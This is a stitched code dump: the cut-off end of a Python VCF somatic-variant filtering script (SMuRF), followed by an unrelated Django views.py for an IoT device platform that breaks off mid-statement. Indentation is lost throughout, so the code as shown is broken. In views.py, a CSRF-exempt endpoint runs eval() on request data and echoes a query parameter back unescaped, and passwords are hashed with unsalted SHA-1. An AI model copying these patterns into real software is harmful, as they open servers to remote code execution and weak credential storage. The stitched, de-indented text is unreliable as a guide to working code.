# Here we'll use GMM in the standard way: the fit() method
# uses an Expectation-Maximization approach to find the best
# mixture of Gaussians for the data
# fit models with 2 components
N = np.arange(int(cfg['SMuRF']['min_components']), int(cfg['SMuRF']['max_components']))
models = [None for i in range(len(N))]
for i in range(len(N)):
models[i] = GaussianMixture(N[i]).fit(X)
# compute the AIC and the BIC
AIC = [m.aic(X) for m in models]
BIC = [m.bic(X) for m in models]
x = np.linspace(0.01, 1, 100)
x = x.reshape([len(x), 1])
M_best = models[np.argmin(AIC)]
means = M_best.means_
N = M_best.n_components
std_devs = [ np.sqrt( np.trace(M_best.covariances_[i])/N) for i in range(0,N) ]
logprob = M_best.score_samples(x)
responsibilities = M_best.predict_proba(x)
p = np.exp(logprob)
p_individual = responsibilities * p[:, np.newaxis]
r = responsibilities
r = r[:, np.argsort([u for m in means for u in m]) ]
return( x, p, p_individual, means, std_devs, r )
def solve(m1,m2,std1,std2):
"""
Function to calculate the intersection points of two distributions
Input: Mean of one distribution
Input: Mean of another distribution
Input: Standard deviation of a distribution
Input: Standard deviation of another distribution
Return: Intersection points
"""
a = 1/(2*std1**2) - 1/(2*std2**2)
b = m2/(std2**2) - m1/(std1**2)
c = m1**2 /(2*std1**2) - m2**2 / (2*std2**2) - np.log(std2/std1)
return np.roots([a,b,c])
def create_vaf_plot():
"""
Function to plot the VAF values
"""
# Open a multipage pdf file
with PdfPages(vcf_name+'_SMuRF_VAFplot.pdf') as pdf:
for sample in vaf_dict:
plt.figure(figsize=(30,10))
x, p, p_individual, means, std_devs, respons = gmm( vaf_dict[sample] )
for idx in range(0,len(x)):
x_vaf = '{0:.2f}'.format(x[idx][0])
responsibilities_dict[sample][x_vaf] = respons[idx].tolist()
ax0 = plt.subplot(1,2,1)
ax0.hist(vaf_dict[sample],bins=50)
ax1 = plt.subplot(1,2,2)
ax1.plot(x, p_individual, '--k', color='lightgray',linewidth=0.5)
ax1.plot(x, p, '-k')
ax1.axvline(x=0.5)
ax1.axvline(x=0.3)
mu = []
# Calculate the intersection points between the distributions
result = solve(means[0],means[1], std_devs[0], std_devs[1])
for r in result:
if r > 0.0 and r <= 1.0:
# ax1.axvline(x=r,linestyle='dashed',color='lightgray',linewidth=0.5)
means = np.append(means,r)
# Plot lines at the mean of each distribution
for m in means:
mu.append(str(("{0:.2f}".format(float(m)))))
ax1.axvline(x=m,linestyle='dashed',color='lightgray',linewidth=0.5)
# Plot formatting
plt.title(sample)
# plt.xlabel('VAF')
plt.ylabel('p(VAF)')
# Set second x axis for the means of each component
ax2 = ax1.twiny()
ax2.xaxis.set_tick_params(length=15)
ax2.set_xticks(means)
ax2.set_xticklabels(mu)
ax2.xaxis.set_ticks_position('bottom')
ax2.xaxis.set_label_position('bottom')
ax2.set_xlim(ax1.get_xlim())
pdf.savefig()
plt.close()
def sample_quality_control( record ):
"""
Function to check if the sample pass the quality control.
Input: VCF record object
Return: True of False if all samples or controls failed the quality control
"""
qc = collections.defaultdict(dict)
noSampleEvidence = 0
controlEvidence = False
indel = False
check = True
# Check if variant is an indel
if (len(record.REF) > 1 or len(record.ALT[0]) > 1):
indel = True
for call in (record.samples):
sample = True
update_call_data(call, ['FT'], [None], vcf_reader)
# Check is the sample is in the control list
if call.sample in args.normal:
sample = False
# QC fails if there is no genotype
if call['GT'] == './.' or call['GT'] == '.|.':
qc[sample][call.sample] = 'NoGenoType'
# QC fails if the coverage is too low
elif (call['DP'] == None or call['DP'] < int(cfg['SMuRF']['coverage'])):
qc[sample][call.sample] = 'LowCov'
elif sample:
# If sample is homozygous reference
if call['GT'] == '0/0' or call['GT'] == '0|0':
noSampleEvidence += 1
if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_homref'])):
qc[sample][call.sample] = 'LowGQ'
elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['sample_gq_homref'])):
qc[sample][call.sample] = 'LowGQ'
else:
qc[sample][call.sample] = 'PASS'
# Check QC for homozygous variant
elif call['GT'] == '1/1' or call['GT'] == '1|1':
if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_homozygous'])):
qc[sample][call.sample] = 'LowGQ'
elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['sample_gq_homozygous'])):
qc[sample][call.sample] = 'LowGQ'
else:
qc[sample][call.sample] = 'PASS'
elif call['GT'] == '0/1' or call['GT'] == '0|1':
if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_heterozygous'])):
qc[sample][call.sample] = 'LowGQ'
elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['sample_gq_heterozygous'])):
qc[sample][call.sample] = 'LowGQ'
else:
qc[sample][call.sample] = 'PASS'
else:
# If variant is also found in a control
if call['GT'] == '0/1' or call['GT'] == '0|1':
controlEvidence = True
if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_heterozygous'])):
qc[sample][call.sample] = 'LowGQ'
elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['control_gq_heterozygous'])):
qc[sample][call.sample] = 'LowGQ'
else:
qc[sample][call.sample] = 'isVariant'
elif call['GT'] == '1/1' or call['GT'] == '1|1':
controlEvidence = True
if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_homozygous'])):
qc[sample][call.sample] = 'LowGQ'
elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['control_gq_homozygous'])):
qc[sample][call.sample] = 'LowGQ'
else:
qc[sample][call.sample] = 'isVariant'
elif call['GT'] == '0/0' or call['GT'] == '0|0':
if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_homref'])):
qc[sample][call.sample] = 'LowGQ'
elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['control_gq_homref'])):
qc[sample][call.sample] = 'LowGQ'
else:
qc[sample][call.sample] = 'PASS'
if call.sample in qc[sample]:
update_call_data(call,['FT'],[qc[sample][call.sample]], vcf_reader)
format_list = list(vcf_reader.formats.keys())
format_list.remove('GT')
format_list.insert(0,'GT')
# Add VAF information to the format field of each sample
record.FORMAT = ":".join(format_list)
# Flag variant if it is found in one of the controls
if controlEvidence:
record.FILTER.append('ControlEvidence')
check = False
# Flag variant if it is not found in one of the samples
elif len(qc[True]) == noSampleEvidence :
record.FILTER.append('NoSampleEvidence')
check = False
elif len(qc[False].keys()) > 0 and list(qc[False].values()).count('PASS') == 0:
record.FILTER.append('AllControlsFailedQC')
check = False
elif list(qc[True].values()).count('PASS') == 0:
record.FILTER.append('AllSamplesFailedQC')
check = False
else:
record.INFO['PASS_QC_SAMPLES'] = list(qc[True].values()).count('PASS')
record.INFO['FAIL_QC_SAMPLES'] = len(qc[True])-list(qc[True].values()).count('PASS')
record.INFO['PASS_QC_SAMPLE_NAMES'] = list(np.array(list(qc[True].keys()))[list(np.where(np.array(list(qc[True].values())) == 'PASS')[0])])
record.INFO['FAIL_QC_SAMPLE_NAMES'] = list(np.array(list(qc[True].keys()))[list(np.where(np.array(list(qc[True].values())) != 'PASS')[0])])
if ( len(qc[False].keys()) > 0 ):
record.INFO['PASS_QC_CONTROLS'] = list(qc[False].values()).count('PASS')
record.INFO['FAIL_QC_CONTROLS'] = len(qc[False])- list(qc[False].values()).count('PASS')
record.INFO['PASS_QC_CONTROL_NAMES'] = list(np.array(list(qc[False].keys()))[list(np.where(np.array(list(qc[False].values())) == 'PASS')[0])])
record.INFO['FAIL_QC_CONTROL_NAMES'] = list(np.array(list(qc[False].keys()))[list(np.where(np.array(list(qc[False].values())) != 'PASS')[0])])
return( check )
def calculate_vaf( record ):
"""
Function to calculate the VAF in the bam files
Input: VCF record object
Return: A tuple with VAF of each sample
"""
record_vaf = {}
vaf_info = collections.defaultdict(lambda: collections.defaultdict(list))
qc = collections.defaultdict(dict)
sample = "UNKNOWN"
for call in (record.samples):
# Add empty VAF and CAD tag to the record
update_call_data(call, ['VAF','CAD'], [None, None], vcf_reader)
for bam in args.bam:
F=pysam.AlignmentFile(bam,'rb')
if bam not in bam_sample_names:
sample_name = get_sample_name(F)
bam_sample_names[bam] = sample_name
else:
sample_name = bam_sample_names[bam]
dv = 0
dr = 0
dx = 0
vaf = 0.0
# Loop through each reads that is overlapping the position of the variant
for pileupcolumn in F.pileup(record.CHROM, int(record.POS)-1, int(record.POS), truncate=True, stepper='nofilter',min_base_quality=int(cfg['SMuRF']['base_phred_quality'])):
for pileupread in pileupcolumn.pileups:
# QC the read
if ( check_pileupread( pileupread) ):
alt = record.ALT[0]
# If variant is a SNV
if (len(record.REF) == 1 and len(alt) == 1):
# Read has the reference
if pileupread.alignment.query_sequence[pileupread.query_position] == record.REF:
dr+=1
# Read has the variant
elif pileupread.alignment.query_sequence[pileupread.query_position] == alt:
dv+=1
# If variant is deletion
elif (len(record.REF) > 1 and len(alt) == 1):
# Read has the deletion
if ( pileupread.indel*-1 == len(record.REF)-1 ):
dv+=1
# Read has no deletion
elif pileupread.indel == 0:
dr+=1
else:
dx+=1
# If variant is an insertion
elif ( len(record.REF) == 1 and len(alt) > 1 ):
# Read has the insertion
if ( pileupread.indel == len(alt)-1 ):
dv+=1
# Read has no insertion
elif pileupread.indel == 0:
dr+=1
else:
dx+=1
# If variant is an INDEL
else:
# Read has the INDEL
if ( pileupread.indel == (len(alt)-len(record.REF)) ):
dv+=1
# Read has no INDEL
elif pileupread.indel == 0:
dr+=1
else:
dx+=1
# Calculate the VAF
try:
vaf = float("{0:.2f}".format(dv/float(dv+dr)))
except ZeroDivisionError:
continue
# Loop through each sample in the vcf file
for call in (record.samples):
sample = True
if call.sample in args.normal:
sample = False
# Check if the sample name in the vcf file is the same as a sample name in the bam file
if call.sample == sample_name:
# Add the VAF and sample name to the output tuple
if vaf > float(cfg['SMuRF']['absent_threshold']) and call.sample not in args.normal:
record_vaf[call.sample] = vaf
# Update the format field for this sample
ft = call['FT']
if float(dv+dr) < int(cfg['SMuRF']['coverage']):
ft = 'LowCov'
qc[sample][call.sample] = 'LowCov'
else:
qc[sample][call.sample] = call['FT']
update_call_data(call, ['VAF','CAD','FT'], [vaf, [dr, dv], ft], vcf_reader)
# Set absent, subclonal or clonal based on the VAF and threshold
if vaf <= float(cfg['SMuRF']['absent_threshold']):
vaf_info[sample]['ABSENT'].append(call.sample)
elif vaf < float(cfg['SMuRF']['clonal_threshold']):
vaf_info[sample]['SUBCLONAL'].append(call.sample)
else:
vaf_info[sample]['CLONAL'].append(call.sample)
format_list = list(vcf_reader.formats.keys())
format_list.remove('GT')
format_list.insert(0,'GT')
# Add VAF information to the format field of each sample
record.FORMAT = ":".join(format_list)
if not sample and dx > 0:
record.FILTER.append('OverlappingIndelInControl')
# Add QC information to the INFO field
if len(qc[False].keys()) > 0 and list(qc[False].values()).count('PASS') == 0:
record.FILTER.append('AllControlsFailedQC')
check = False
elif list(qc[True].values()).count('PASS') == 0:
record.FILTER.append('AllSamplesFailedQC')
check = False
else:
record.INFO['PASS_QC_SAMPLES'] = list(qc[True].values()).count('PASS')
record.INFO['FAIL_QC_SAMPLES'] = len(qc[True])-list(qc[True].values()).count('PASS')
record.INFO['PASS_QC_SAMPLE_NAMES'] = list(np.array(list(qc[True].keys()))[list(np.where(np.array(list(qc[True].values())) == 'PASS')[0])])
record.INFO['FAIL_QC_SAMPLE_NAMES'] = list(np.array(list(qc[True].keys()))[list(np.where(np.array(list(qc[True].values())) != 'PASS')[0])])
if ( len(qc[False].keys()) > 0 ):
record.INFO['PASS_QC_CONTROLS'] = list(qc[False].values()).count('PASS')
record.INFO['FAIL_QC_CONTROLS'] = len(qc[False])- list(qc[False].values()).count('PASS')
record.INFO['PASS_QC_CONTROL_NAMES'] = list(np.array(list(qc[False].keys()))[list(np.where(np.array(list(qc[False].values())) == 'PASS')[0])])
record.INFO['FAIL_QC_CONTROL_NAMES'] = list(np.array(list(qc[False].keys()))[list(np.where(np.array(list(qc[False].values())) != 'PASS')[0])])
# Add clonal information to the INFO field
record.INFO['ABSENT_SAMPLES'] = len(vaf_info[True]['ABSENT'])
record.INFO['SUBCLONAL_SAMPLES'] = len(vaf_info[True]['SUBCLONAL'])
record.INFO['CLONAL_SAMPLES'] = len(vaf_info[True]['CLONAL'])
record.INFO['ABSENT_CONTROLS'] = len(vaf_info[False]['ABSENT'])
record.INFO['SUBCLONAL_CONTROLS'] = len(vaf_info[False]['SUBCLONAL'])
record.INFO['CLONAL_CONTROLS'] = len(vaf_info[False]['CLONAL'])
record.INFO['ABSENT_SAMPLE_NAMES'] = vaf_info[True]['ABSENT']
record.INFO['SUBCLONAL_SAMPLE_NAMES'] = vaf_info[True]['SUBCLONAL']
record.INFO['CLONAL_SAMPLE_NAMES'] = vaf_info[True]['CLONAL']
record.INFO['ABSENT_CONTROL_NAMES'] = vaf_info[False]['ABSENT']
record.INFO['SUBCLONAL_CONTROL_NAMES'] = vaf_info[False]['SUBCLONAL']
record.INFO['CLONAL_CONTROL_NAMES'] = vaf_info[False]['CLONAL']
# Flag variant if it is found subclonal in a control
if len(vaf_info[False]['SUBCLONAL']) > 0:
record.FILTER.append('ControlSubclonal')
# Flag variant if it is found clonal in a control
elif len(vaf_info[False]['CLONAL']) > 0:
record.FILTER.append('ControlClonal')
# Flag variant if it is not found clonal in one of the samples
elif len(vaf_info[True]['CLONAL']) == 0:
record.FILTER.append('NoClonalSample')
return( record_vaf )
def create_blacklist():
"""
Function to fill the blacklist dictionary
"""
# global blacklist
# Loop through every blacklist file given on the command line
blacklists = []
for bl_vcf in cfg['SMuRF']['blacklist'].split(","):
blacklist_single = pd.read_csv(bl_vcf,
sep="\t",
comment="#",
header=None,
names=["chr", "loc"],
usecols=["chr", "loc"],
dtype={0: "str", 1: "int"})
if bl_vcf.endswith(".bed"):
blacklist_single["loc"] += 1 #Bed files are 0-based and are converted to 1-based.
elif not bl_vcf.endswith(".vcf"):
warnings.warn("""The blacklist: {0} is not a .vcf or .bed file. Continuing with the following assumptions:\n
Column 1: Chromosome\n
Column 2: 1-based position\n
Header/Comments: #""".format(bl_vcf))
blacklists.append(blacklist_single)
blacklist = pd.concat(blacklists)
blacklist["chr"] = blacklist["chr"].str.lower().str.replace("chr|chrom", "")
blacklist = {k: g["loc"].tolist() for k, g in blacklist.groupby("chr")}
return( blacklist )
def merge_tmp_vcfs():
"""
Function to merge all the tmp contig vcf files
"""
start = time.time()
header = False
# Loop through all chromomsomes
for contig in contig_list:
if not header:
os.system('cat SMuRF_tmp/{}_SMuRF.vcf > {}_SMuRF.vcf'.format(contig, vcf_name))
header = True
else:
os.system('grep -v \'^#\' SMuRF_tmp/{}_SMuRF.vcf >> {}_SMuRF.vcf'.format(contig, vcf_name))
os.system("grep -P '^#|\s+PASS\s+' "+vcf_name+"_SMuRF.vcf > SMuRF_tmp/filter.vcf")
def add_responsibilities():
vcf_reader = pyvcf.Reader(filename="SMuRF_tmp/filter.vcf", encoding='utf-8')
vcf_reader.formats['PC'] = pyvcf.parser._Format('PC',None,'Float','Probability of each component')
vcf_writer = pyvcf.Writer(open(vcf_name+'_SMuRF_filtered.vcf','w', encoding='utf-8'), vcf_reader)
for record in vcf_reader:
for call in (record.samples):
vaf = call['VAF']
sample = call.sample
if vaf != None and vaf > 0.0:
vaf = '{0:.2f}'.format(vaf)
update_call_data(call, ['PC'], [responsibilities_dict[sample][str(vaf)]], vcf_reader)
else:
update_call_data(call, ['PC'], [None], vcf_reader)
format_list = list(vcf_reader.formats.keys())
format_list.remove('GT')
format_list.insert(0,'GT')
# Add VAF information to the format field of each sample
record.FORMAT = ":".join(format_list)
vcf_writer.write_record(record)
# os.system("rm -rf SMuRF_tmp/*")
time.sleep(5)
os.system("rm -rf SMuRF_tmp")
if __name__ == "__main__":
#get_command_line()
main()
create_vaf_plot()
merge_tmp_vcfs()
add_responsibilities()
|
views.py | from django.shortcuts import render, HttpResponse, redirect
from SqlMaster.models import *
import hashlib
import datetime
import random
from django.views.decorators.csrf import csrf_exempt
import json
from threading import Thread
from queue import Queue
from django.db.models import F, Q
# 生成设备注册码
def createCode():
code = ''.join(random.sample(
['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'l', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'U', 'V', 'W', 'X',
'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'], 15))
return code
# 异常状态函数
def waringDevice(user_obj):
devices = []
system = []
waring_devices = []
for system_obj in user_obj.system.all():
for device_obj in system_obj.device.all():
devices.append(device_obj)
for device_obj in devices:
if device_obj.data.filter(waring=1).all():
system.append(device_obj.system)
waring_devices.append(device_obj)
return system, waring_devices
# Create your views here.
def home_no(request):
is_login = request.session.get('IS_LOGIN', False)
if is_login:
username = request.session.get('USERNAME')
url = '/home/' + username
return redirect(url)
else:
return render(request, 'waring_login.html')
# 用于测试oneNET http推送
# huyunjiang 专用
@csrf_exempt
def onenet(request):
if request.method == 'GET':
return HttpResponse(request.GET['msg'])
else:
msg = json.loads(request.body)['msg']
imei = msg['imei']
data = eval(msg['value'])
print(msg, imei, data, data['Lat'])
if Device.objects.filter(IMEI=imei):
device_obj = Device.objects.filter(IMEI=imei)[0]
if data['Full'] == 1:
Data.objects.create(device=device_obj, model=0, data=msg['value'], waring=1)
return HttpResponse("123")
else:
Data.objects.create(device=device_obj, model=0, data=msg['value'])
return HttpResponse("123")
else:
return HttpResponse("123")
def admin_no(request):
is_login = request.session.get('IS_LOGIN', False)
if is_login:
username = request.session.get('USERNAME')
url = '/admin/' + username
return redirect(url)
else:
return render(request, 'waring_login.html')
def mainAdmin(request, username):
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
# 拿到用户ORM对象
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 有无异常设备
waring_system_list, waring_device_list = waringDevice(user_obj)
user_name = user_obj.name
first_name = user_name[0]
# 确定header选中
plat_admin_chose = 'active'
# 确定menu选中
main_admin = 'active'
# 主体栏显示的部分
exhibition_name = '平台概况'
# 设备列表
devices = []
# 用户设备数
for system_obj in user_obj.system.all():
for device_obj in system_obj.device.all():
devices.append(device_obj)
device_count = len(devices)
# 系统列表
system_list = System.objects.filter(admin=user_obj)
# 系统个数
system_count = system_list.count()
# 今日时间
now_date = str(datetime.datetime.now().date())
# 今日推送数据列表
today_push_data = []
# 今日订阅数据列表
today_pull_data = []
for device_obj in devices:
for data_obj in device_obj.data.all():
if str(data_obj.date).split()[0] == now_date:
if data_obj.model:
today_push_data.append(data_obj)
else:
today_pull_data.append(data_obj)
# 今日推送数据数
today_push_data_count = len(today_push_data)
# 今日订阅消息数
today_pull_data_count = len(today_pull_data)
# 子系统饼状图
system_type_dict = {'Jinger': 0, 'Detritus': 0, 'Lumiere': 0, 'Parquer': 0, 'Others': 0, }
for system_obj in system_list:
system_type_dict[str(system_obj.platform)] = system_type_dict[str(system_obj.platform)] + 1
# 设备数柱状图
device_count_dict = {'Jinger': 0, 'Detritus': 0, 'Lumiere': 0, 'Parquer': 0, 'Others': 0, }
for system_obj in system_list:
device_count_dict[str(system_obj.platform)] = device_count_dict[str(system_obj.platform)] + len(
system_obj.device.all())
return render(request, 'admin.html', locals())
else:
return redirect('/admin/' + request.session.get('USERNAME'))
else:
return redirect('/')
def deviceAdmin(request, username):
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
# 拿到用户ORM对象
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 有无异常设备
waring_system_list, waring_device_list = waringDevice(user_obj)
user_name = user_obj.name
first_name = user_name[0]
# 确定header选中
plat_admin_chose = 'active'
# 确定menu选中
device_admin = 'active'
# 主体栏显示的部分
exhibition_name = '设备管理'
# 系统列表
system_list = System.objects.filter(admin=user_obj)
# 管理设备列表
devices = []
for system_obj in user_obj.system.all():
for device_obj in system_obj.device.all():
devices.append(device_obj)
# 设备总数
device_count = len(devices)
# 今日时间
now_date = str(datetime.datetime.now().date())
# 活跃设备数
device_active_count = 0
for device_obj in devices:
if device_obj.data.all():
if str(device_obj.data.last().date).split()[0] == now_date:
device_active_count = device_active_count + 1
# 异常设备数
device_waring_count = 0
for device_obj in devices:
if device_obj.data.filter(waring=1).all():
device_waring_count = device_waring_count + 1
return render(request, 'deviceAdmin.html', locals())
else:
return redirect('/admin/' + request.session.get('USERNAME') + '/device')
else:
return redirect('/')
def deviceRemove(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
did = request.POST.get('did')
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 设备对象
device_obj = Device.objects.filter(id=did)[0]
# 判断是否有管理权限(系统创建者和管理员)
if (
device_obj.system.createuser == user_obj and user_obj in device_obj.system.admin.all()) or not user_obj.rely:
# 删除设备
device_obj.delete()
Operation.objects.create(
code=303,
user=user_obj)
return HttpResponse('666')
else:
# 不属于user管理
return HttpResponse('555')
else:
return redirect('/admin/' + request.session.get('USERNAME') + '/device/')
else:
return redirect('/')
else:
return redirect('/')
def systemCreate(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 获得post数据
name = request.POST.get('name')
platform = request.POST.get('platform')
type = request.POST.get('type')
protocol = request.POST.get('protocol')
code = createCode()
# 判断模板
if str(type).startswith('{\'Lon\':\'经度\',\'Lat\':\'纬度\',\'Switch\':\'设备状态\',\'Cycle\':\'订阅周期\','):
if System.objects.filter(domain_id=request.session.get('DOMAIN_ID'), name=name):
return HttpResponse('444')
else:
# 创建系统
System.objects.create(name=name, platform=platform, type=type, protocol=protocol,
domain_id=request.session.get('DOMAIN_ID'), createuser=user_obj,
devicecode=code)
# 增加管理权限
admin_user = user_obj
while True:
if admin_user.rely:
System.objects.filter(name=name, domain_id=request.session.get('DOMAIN_ID'))[
0].admin.add(admin_user, admin_user.rely)
admin_user = admin_user.rely
else:
System.objects.filter(name=name, domain_id=request.session.get('DOMAIN_ID'))[
0].admin.add(admin_user)
break
# 操作记录
Operation.objects.create(code=202, user=user_obj)
return HttpResponse('666')
else:
return HttpResponse('222')
else:
return redirect('/admin/' + request.session.get('USERNAME'))
else:
return redirect('/')
else:
return redirect('/')
def systemRemove(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
sid = request.POST.get('sid')
# 用户对象
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 系统对象
sys_obj = System.objects.filter(id=sid)[0]
# 确定是否有权限删除系统(创建者或者管理员用户)
if (sys_obj.createuser == user_obj and user_obj in sys_obj.admin.all()) or not user_obj.rely:
# 删除子用户
sys_obj.admin.clear()
sys_obj.delete()
Operation.objects.create(
code=203, user=user_obj)
return HttpResponse('666')
else:
return HttpResponse('555')
else:
return redirect('/admin/' + request.session.get('USERNAME'))
else:
return redirect('/')
else:
return redirect('/')
def deviceAdd(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 获得post数据
name = request.POST.get('name')
sid = request.POST.get('sid')
IMEI = request.POST.get('IMEI')
if Device.objects.filter(system_id=sid, name=name):
return HttpResponse('444')
else:
Device.objects.create(name=name, IMEI=IMEI, system_id=sid)
# 操作记录
Operation.objects.create(code=302, user=user_obj)
return HttpResponse('666')
else:
return redirect('/admin/' + request.session.get('USERNAME') + '/device/')
else:
return redirect('/')
else:
return redirect('/')
def mainHome(request, username):
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 有无异常设备
waring_system_list, waring_device_list = waringDevice(user_obj)
domain = Domain.objects.filter(
id=request.session.get('DOMAIN_ID'))[0]
domain_name = domain.name
user_name = user_obj.name
first_name = user_name[0]
# 确定header选中
user_center_chose = 'active'
# 确定menu选中
main_home = 'active'
# 主体栏显示的部分
exhibition_name = '用户管理'
user_leve = 1
dic_user = {
1: '管理员用户',
2: '二级用户',
3: '三级用户',
4: '四级用户',
5: '五级用户',
6: '六级用户',
}
sub_user = user_obj
while True:
if sub_user.rely_id:
sub_user = sub_user.rely
user_leve = user_leve + 1
else:
user_class = dic_user.get(user_leve)
break
# 下级用户
sub_user = Users.objects.filter(rely_id=user_obj.id)
sub_user_count = sub_user.count()
system_count = user_obj.system.count()
return render(request, 'home.html', locals())
else:
return redirect('/home/' + request.session.get('USERNAME'))
else:
return redirect('/')
def authHome(request, username):
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 有无异常设备
waring_system_list, waring_device_list = waringDevice(user_obj)
user_name = user_obj.name
first_name = user_name[0]
# 确定header选中
user_center_chose = 'active'
# 确定menu选中
auth_home = 'active'
# 主体栏显示的部分
exhibition_name = '权限设置'
# 系统列表
system_list = System.objects.filter(admin=user_obj)
# 系统个数
system_count = system_list.count()
sub_user = Users.objects.filter(rely=user_obj)
return render(request, 'authHome.html', locals())
else:
return redirect('/home/' + request.session.get('USERNAME') + '/auth')
else:
return redirect('/')
def centerHome(request, username):
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 有无异常设备
waring_system_list, waring_device_list = waringDevice(user_obj)
user_name = user_obj.name
first_name = user_name[0]
# 确定header选中
user_center_chose = 'active'
# 确定menu选中
center_home = 'active'
# 主体栏显示的部分
exhibition_name = '个人中心'
return render(request, 'centerHome.html', locals())
else:
return redirect('/home/' + request.session.get('USERNAME') + '/center')
else:
return redirect('/')
def domainChange(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
domain = Domain.objects.filter(
id=request.session.get('DOMAIN_ID'))[0]
# 判断是否为管理员用户
if user_obj.rely:
return HttpResponse('222')
else:
# 修改域
reg_domain = request.POST.get('domain')
reg_country = request.POST.get('country')
reg_province = request.POST.get('province')
reg_city = request.POST.get('city')
domain.name = reg_domain
domain.country = reg_country
domain.province = reg_province
domain.city = reg_city
domain.save()
# 操作记录
Operation.objects.create(code=100, user=user_obj)
return HttpResponse('666')
else:
return redirect('/home/' + request.session.get('USERNAME') + '/center')
else:
return redirect('/')
else:
return redirect('/home')
def userAdd(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
# 获取post数据
reg_username = request.POST.get('username')
reg_name = request.POST.get('name')
reg_pwd = request.POST.get('password')
reg_tel = request.POST.get('tel')
reg_email = request.POST.get('email')
# 用户对象
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 所属域对象
domain = Domain.objects.filter(
id=request.session.get('DOMAIN_ID'))[0]
new_user = Users.objects.filter(username=reg_username, domain_id=request.session.get('DOMAIN_ID'))
if new_user:
# 用户存在
return HttpResponse('444')
else:
new_user = Users.objects.filter(phone=reg_tel)
if new_user:
# 手机号存在
return HttpResponse('777')
else:
new_user = Users.objects.filter(email=reg_email)
if new_user:
# 邮箱存在
return HttpResponse('888')
else:
# hash 密码
password = hashlib.sha1(
reg_pwd.encode(encoding='utf8')).hexdigest()
# 创建子用户
Users.objects.create(username=reg_username, password=password, name=reg_name,
domain=domain, rely=user_obj,
phone=reg_tel, email=reg_email)
# 操作记录
Operation.objects.create(code=101, user=user_obj)
return HttpResponse('666')
else:
return redirect('/home/' + request.session.get('USERNAME') + '/center')
else:
return redirect('/')
else:
return redirect('/')
def userRemove(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
sub_id = request.POST.get('id')
# 子用户对象
sub_obj = Users.objects.filter(
id=sub_id,
rely=Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
if sub_obj:
# 删除子用户
sub_obj.delete()
Operation.objects.create(
code=102,
user=Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
return HttpResponse('666')
else:
# 不属于user管理
return HttpResponse('555')
else:
return redirect('/home/' + request.session.get('USERNAME'))
else:
return redirect('/')
else:
return redirect('/')
def adminRemove(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
# 获得post数据
sub_id = request.POST.get('uid')
sys_id = request.POST.get('sid')
# 下级用户对象
sub_obj = Users.objects.filter(
id=sub_id,
rely=Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
if sub_obj:
# 删除管理权限
sub_obj[0].system.remove(sys_id)
Operation.objects.create(code=205, user=
